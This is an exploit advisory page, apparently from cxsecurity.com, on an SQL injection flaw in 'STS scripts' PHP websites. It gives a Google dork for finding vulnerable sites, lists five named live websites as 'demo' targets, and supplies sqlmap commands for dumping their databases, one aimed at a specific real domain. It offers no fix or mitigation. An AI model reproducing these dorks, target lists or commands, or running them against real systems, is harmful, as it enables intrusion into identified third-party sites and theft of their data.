STS scripts - sql injection Vulnerability

2017.11.17
Credit: Xresponse
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

|======================================================================= |Exploit Title: STS scripts - sql injection Vulnerability |Exploit Author: Xresponse |Date : Friday - 2017 17 november |Tested on : win 7 & Linux |Vendor Home Page : http://sts-egypt.com |Google Dork: inurl:.php?id= intext:" Designed and Developed by STS" |Version : 1.x.x |======================================================================= |Demo site: | 1)http://medianceacademy.com/courses-details.php?id=48 | 2)http://amawywt.com/products.php?id=24 | 3)http://http://goldensparts.com/products-details.php?id=19&cid=1 | 4)http://unistone-eg.com/products-details.php?id=21 | 5)goldenfoods.com.eg/product-details.php?id=23 |======================================================================= |pof: |in this vul An Attacker can Run SQL Methods | | exploit:sqlmap -u http://www.goldenfoods.com.eg/product-details.php?id=19 --dbs --string="BACK" | or : sqlmap -u "target-url" --dbs --dbms=mysql --level 5 --risk 3 --string="BACK" --tamper=space2comment |======================================================================= |Discovered By: Xresponse |=======================================================================


Vote for this issue:
66%
34%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top